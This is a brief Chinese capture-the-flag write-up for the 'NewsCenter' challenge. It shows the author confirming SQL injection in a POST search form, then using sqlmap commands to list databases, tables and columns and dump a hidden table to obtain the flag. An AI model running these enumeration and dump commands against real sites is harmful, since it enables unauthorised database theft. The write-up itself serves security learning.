打开界面有一个搜索框
抓包查看是post形式提交的数据包
这时候试试sql注入,万能密码直接全都显示,那就说明存在sql注入漏洞
这里试试用sqlmap自动注入试试(POST类型的sql注入第一次尝试)
- 查数据库
sqlmap.py -r test1.txt --dbs
- 查表
sqlmap.py -r test1.txt -D news --tables
- 查列
sqlmap.py -r test1.txt -D news -T secret_table --columns
- 查字段
sqlmap.py -r test1.txt -D news -T secret_table -C "fl4g" --dump
得到flag:QCTF{sq1_inJec7ion_ezzz}
或者直接一步到位把整个数据库的字段爆出来
sqlmap.py -r test1.txt -D news --dump
标签:sqlmap,test1,NewsCenter,--,py,news,txt From: https://www.cnblogs.com/lhqrusht0p/p/17814544.html